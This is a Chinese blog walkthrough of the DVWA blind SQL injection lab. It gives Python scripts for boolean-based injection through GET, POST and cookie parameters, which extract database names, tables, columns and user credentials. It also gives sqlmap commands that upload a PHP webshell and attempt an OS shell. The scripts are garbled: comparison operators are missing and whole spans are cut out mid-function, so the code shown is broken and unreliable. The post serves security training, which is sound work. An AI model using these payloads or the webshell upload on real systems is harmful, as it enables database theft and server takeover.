您当前的位置: 首页 >  sql

仙女象

暂无认证

  • 1浏览

    0关注

    136博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

DVWA通关--SQL盲注(SQL Injection(Blind))

仙女象 发布时间:2021-07-11 22:53:29 ,浏览量:1

本文所有代码可以通过JacquelinXiang/sqli_bool: A simple tool/framework for boolean-based sql injection(GET/POST/COOKIE) (github.com)下载,README中有使用方法。

本文内容未经允许不可转载,其他原创文章也是。

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

目录

LOW

通关步骤

代码分析

MEDIUM

通关步骤

代码分析

HIGH

通关步骤

代码分析

IMPOSSIBLE

代码分析

LOW 通关步骤

1、观察页面返回的信息:

输入1,按Submit之后返回User ID exists in the database.

输入6,按Submit之后返回User ID is MISSING from the database.

以上现象说明输入正确的值会返回User ID exists in the database,如果输入错误的值会返回User ID is MISSING from the database。

2、找闭合

输入1',按Submit之后返回User ID is MISSING from the database.

输入1'',按Submit之后返回User ID exists in the database

说明闭合是单引号。

3、爆库

接下来如果用纯手工注入就太慢啦,写了个python脚本来完成爆库

#!/usr/bin/python3
# coding=utf-8

"""
functions for boolean-based sql injection(GET)

:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind"               #有可利用漏洞的url,根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request报文头部,根据实际情况填写
cookies={"security": "low", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}          #单个cookie的情况可以直接写在headers中,两个cookie的情况要用字典形式的cookies参数
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、可见特殊字符
flag = 'User ID exists in the database'                                        #用于判断附加sql语句为真的字符,根据网页回显填写

def CurrentDatabaseGET():
    n = 10                                                                      #预测当前数据库名称最大可能的长度,根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j3:
            payload1 = "1' and length(database())>"+str(j)+"-- ss"           #所有payload根据实际情况填写
            param = {
            "id":payload1,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)     #GET方法发送含payload的request
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            param = {
            "id":payload4,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"')))>"+str(j)+"-- ss"
            param = {
            "id":payload7,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload10 = "1' and (length((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+")))>"+str(j)+"-- ss"
            param = {
            "id":payload10,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k  select @@datadir
 
 

 

可以猜测网站根目录可能是C:\phpstudy_pro\WWW\dvwa\
 

得到根目录之后可以尝试传马
 

(1)方法1:-file-write
 
 
 
python sqlmap.py -u "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=434snj2pt58c6hmb5ojinsqi50" --technique B -file-write "E:\渗透测试学习资料\dvwa\file upload\sh.php" --file-dest "C:/phpstudy_pro/WWW/dvwa/shi.php"
 
 

webshell上传成功
 

 

服务器上可以看到写入的文件,比原始文件多了 admin    admin
 

 

连接成功
 

 

(2)方法2:--os-shell
 
 
 
python sqlmap.py -u "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=8qtjtspq8nt3rhen72m5e4msd7" --technique B --os-shell
 
 

 

返回的结果是没成功,但是我看服务器上虽然后门没传上去,上传文件用的那个php文件倒是传上去了,问题是一来sqlmap报了错,我们不登陆服务器就不知道这文件传上去了 ,二来这文件名也是有一定随机性的,sqlmap报错就不告诉我们这个文件的名字了。
 

 

 

至于为什么会传马失败,我后来换到SQL Injection关卡low关发现,同样环境下这关是可以传马成功的,于是我对比了两关的代码,结合sqlmap返回的信息中有404 page not found,我觉得应该是本关代码中的“header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );”这句起到了作用。把这句注释掉之后,果然,sqlmap传马成功。
 

 
代码分析 

 

简单看一下本关代码,由于用户传入的id参数可以被当作sql语句执行,导致了sql注入漏洞。不过比起SQL Injection关卡low关稍微好点的是,对用户屏蔽了数据库错误信息,另外,就像刚刚说的那样,19行对sqlmap传马也起到了一些干扰。
 
MEDIUM 
通关步骤 

1、观察页面
 

仔细一瞅,这关前端有限制,只能选数字1~5,而且提交表单的方式不是GET
 

 

burpsuite抓个包,send to repeater
 

发送前端限制内的数字试一下,返回User ID exists in the database
 

 

发送前端限制外的数字试一下,返回User ID is MISSING from the database
 

 

财富密码获取成功,可以开搞了
 

2、找闭合
 

id=1'时id=1''时id=1"时id=1""时全都返回User ID is MISSING from the database,估摸着不但闭合不是引号,而且引号还被过滤了。
 

id=6 or 1=1-- s时返回User ID exists in the database,可以判断id可注入,并且不需要闭合。
 

 

3、爆库
 

这关也写了个python脚本,特点是POST方法提交表单,多cookie,引号过滤绕过
 

#!/usr/bin/python3
# coding=utf-8

"""
functions for boolean-based sql injection(POST,with Single quotes filtering bypass)

:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests
import binascii

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"               #有可利用漏洞的url,根据实际情况填写
headers={ 
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",  
    }    #http request报文头部,根据实际情况填写
cookies={"security": "medium", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}          #单个cookie的情况可以直接写在headers中,两个cookie的情况要用字典形式的cookies参数
 
keylist = [hex(i) for i in range(33, 127)]                                     #十六进制ASCII,包括数字、大小写字母、可见特殊字符
flag = 'User ID exists in the database'                                        #用于判断附加sql语句为真的字符,根据网页回显填写

def CurrentDatabasePOST():
    n = 10                                                                      #预测当前数据库名称最大可能的长度,根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j3:
            payload1 = "1 and length(database())>"+str(j)+"-- ss"           #所有payload根据实际情况填写
            param = {
            "id":payload1,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)     #POST方法发送含payload的request
            #print(response.request.body)
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload4 = "1 and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            param = {
            "id":payload4,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload7 = "1 and (length((select group_concat(column_name) from information_schema.columns where table_name = 0x"+table+")))>"+str(j)+"-- ss"
            param = {
            "id":payload7,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload10 = "1 and (length((select group_concat(concat("+col1+",0x5E,"+col2+")) from "+table+")))>"+str(j)+"-- ss"
            param = {
            "id":payload10,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k"+str(j)+"-- ss"           #所有payload根据实际情况填写
            cookies["id"] = payload1                                         #cookie增加包含payload的键值对
            response = requests.get(url, headers = headers, cookies = cookies)     #GET方法发送含payload的request,payload在cookie中
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            cookies["id"] = payload4
            response = requests.get(url, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"')))>"+str(j)+"-- ss"
            cookies["id"] = payload7
            response = requests.get(url, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload10 = "1' and (length((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+")))>"+str(j)+"-- ss"
            cookies["id"] = payload10
            response = requests.get(url, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k
关注
打赏
1661867686
查看更多评论

最近更新

热门博客

[ 申请 ]友情链接:

ClashX教程 绘画宝宝 配音宝宝
0.0397s